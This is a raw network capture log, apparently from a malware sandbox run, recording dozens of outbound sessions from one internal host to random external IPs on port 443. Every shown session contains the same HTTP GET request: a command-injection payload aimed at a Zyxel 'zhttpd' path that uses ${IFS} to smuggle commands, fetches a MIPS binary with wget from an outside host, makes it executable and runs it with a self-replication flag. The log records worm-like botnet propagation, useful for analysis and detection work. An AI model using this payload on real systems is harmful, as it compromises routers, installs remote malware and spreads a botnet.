                                                  Jan 19, 2024 18:23:58.103039980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4954192.168.2.134943864.239.160.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103096962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4955192.168.2.134922071.154.201.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103126049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4956192.168.2.133503481.105.92.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103152990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4957192.168.2.134059878.137.2.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103204012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4958192.168.2.133962894.74.204.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103244066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4959192.168.2.134337086.184.161.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103269100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4960192.168.2.134571095.197.6.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103341103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4961192.168.2.1342472179.23.255.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103379965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4962192.168.2.1344552162.50.139.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103401899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4963192.168.2.1357822210.196.134.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103430033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4964192.168.2.1355486185.118.2.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103471994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4965192.168.2.1340250178.238.201.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103496075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4966192.168.2.1341868108.34.192.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103528976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4967192.168.2.135501224.16.155.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103564024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4968192.168.2.133645846.47.16.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103606939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4969192.168.2.1344846194.41.6.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103645086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4970192.168.2.134241884.179.242.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103693008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4971192.168.2.1347130159.122.70.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103722095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4972192.168.2.1355704140.31.113.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103774071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4973192.168.2.134888859.209.218.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103826046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4974192.168.2.1354320191.9.5.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103864908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4975192.168.2.1339354202.79.219.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103888988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4976192.168.2.133578261.35.130.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103924036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4977192.168.2.135954263.138.250.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.103976965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4978192.168.2.135393088.189.183.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104027987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4979192.168.2.1352296201.171.25.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104046106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4980192.168.2.1352586199.48.64.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104094982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4981192.168.2.1353986117.40.89.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104151011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4982192.168.2.1339700216.26.235.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104198933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4983192.168.2.1346732220.121.13.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104228973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4984192.168.2.135914860.197.94.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104258060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4985192.168.2.1356156181.241.226.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104312897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4986192.168.2.1343630101.88.229.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104348898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4987192.168.2.133425069.178.61.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104358912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4988192.168.2.133573254.121.144.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104408979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4989192.168.2.1335098122.145.166.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104448080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4990192.168.2.1334000201.89.144.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104480982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4991192.168.2.1341340216.29.217.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104509115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4992192.168.2.133831891.206.50.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104562044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4993192.168.2.1340530113.183.186.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104604006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4994192.168.2.1347518218.124.125.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104636908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4995192.168.2.135894252.83.214.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104671955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4996192.168.2.133732875.49.71.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104712963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4997192.168.2.134274481.166.22.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104744911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4998192.168.2.1352426212.143.21.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104779959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4999192.168.2.135249872.157.130.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104815006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5000192.168.2.1338254196.189.74.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104839087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5001192.168.2.1350728100.166.252.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104902983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5002192.168.2.134384695.245.233.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104928970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5003192.168.2.1347990158.232.240.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104962111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5004192.168.2.13581704.71.252.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.104994059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5005192.168.2.135997023.216.162.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105036020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5006192.168.2.135786651.62.39.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105048895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5007192.168.2.135751673.208.225.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105093002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5008192.168.2.1345528175.41.41.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105128050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5009192.168.2.135591491.161.142.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105191946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5010192.168.2.1359724175.201.160.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105222940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5011192.168.2.134498060.159.130.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105302095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5012192.168.2.133917665.61.30.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105329037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5013192.168.2.133916235.91.218.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105351925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5014192.168.2.1347594101.251.86.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105386019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5015192.168.2.1344922189.102.202.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.105427027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5016192.168.2.1338366128.95.110.62443
                                                  TimestampBytes transferredDirectionData
